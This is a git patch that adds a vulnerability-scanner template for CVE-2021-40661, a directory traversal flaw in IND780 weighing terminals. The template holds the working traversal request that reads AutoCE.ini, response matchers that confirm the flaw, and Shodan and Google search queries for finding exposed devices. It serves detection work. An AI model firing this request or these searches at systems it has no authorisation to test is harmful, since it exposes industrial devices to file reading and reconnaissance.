From 6f3b81da16a6c86f17e1536bcb1f92ec8fb32b24 Mon Sep 17 00:00:00 2001 From: For3stCo1d <57119052+For3stCo1d@users.noreply.github.com> Date: Wed, 2 Nov 2022 23:05:10 +0800 Subject: [PATCH] Create CVE-2021-40661.yaml --- cves/2021/CVE-2021-40661.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2021/CVE-2021-40661.yaml diff --git a/cves/2021/CVE-2021-40661.yaml b/cves/2021/CVE-2021-40661.yaml new file mode 100644 index 0000000000..16c833a453 --- /dev/null +++ b/cves/2021/CVE-2021-40661.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-40661 + +info: + name: IND780 - Directory Traversal + author: For3stCo1d + severity: high + description: | + A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future. + reference: + - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661 + classification: + cve-id: CVE-2021-40661 + metadata: + shodan-query: "IND780" + google-query: inurl:excalweb.dll + tags: cve,cve2021,ind780,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ExePath=\Windows' + - 'WorkDir=\Windows' + condition: and + + - type: status + status: + - 200